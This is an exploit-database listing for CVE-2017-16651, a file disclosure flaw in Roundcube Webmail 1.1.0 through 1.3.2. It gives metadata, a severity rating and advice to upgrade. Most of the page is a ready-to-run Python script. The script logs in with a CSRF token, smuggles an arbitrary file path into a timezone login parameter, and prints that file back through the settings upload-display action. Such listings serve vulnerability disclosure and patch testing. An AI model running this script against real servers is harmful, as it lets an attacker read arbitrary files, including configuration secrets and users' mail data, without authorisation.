Roundcube Webmail 1.2 - File Disclosure

vendor:

Roundcube Webmail

by:

stonepresto

7.8

CVSS

HIGH

File Disclosure

200

CWE

Product Name: Roundcube Webmail

Affected Version From: 1.1.0

Affected Version To: 1.3.2

Patch Exists: YES

Related CWE: CVE-2017-16651

CPE: a:roundcube:roundcube_webmail:1.2

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-16651/, https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2017-16651/

Other Scripts: N/A

Platforms Tested: roundcube version 1.2-beta

2017

Roundcube Webmail 1.2 – File Disclosure

Roundcube Webmail versions 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2 are vulnerable to a file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted request to the web server. This will allow the attacker to read any file on the server.

Mitigation:

Upgrade to the latest version of Roundcube Webmail.

Source

Exploit-DB raw data:

# Exploit Title: Roundcube Webmail 1.2 - File Disclosure 
# Date: 09-11-2017
# Exploit Author: stonepresto
# Vendor Homepage: https://roundcube.net/
# Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/
# Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
# Tested on: roundcube version 1.2-beta
# CVE : CVE-2017-16651

#!/usr/bin/env python3
# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1
# https://github.com/stonepresto/CVE-2017-16651
# Exploit Author: stonepresto

import requests
import re
import sys

URL="https://127.0.0.1/"
USER="user@example.com"
PASS="password"

def main():
    s = requests.Session()
    r = s.get(URL,params={"_task":"login"},verify=False)
    token = None
    for line in r.text.split("\n"):
        if 'name="_token"' in line:
            token = line.split("value=")[1].split('"')[1]
            print("[+] token: %s" % token)
    if token is None:
        print("[!] unable to retrieve token")
        sys.exit(1)

    data = {
        "_token":token,
        "_task":"login",
        "_action":"login",
        "_timezone[files][1][path]":sys.argv[1],
        "_url":"_task%3Dlogin",
        "_user":USER,
        "_pass":PASS
    }
    r = s.post(URL,params={"_task":"login"},data=data,verify=False)

    params = {
        "_task":"settings",
        "_action":"upload-display",
        "_from":"timezone",
        "_file":"rcmfile1"
    }

    r = s.get(URL,params=params,verify=False)
    print(r.text)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("[!] Usage: %s <file-to-read>" % sys.argv[0])
    else:
        main()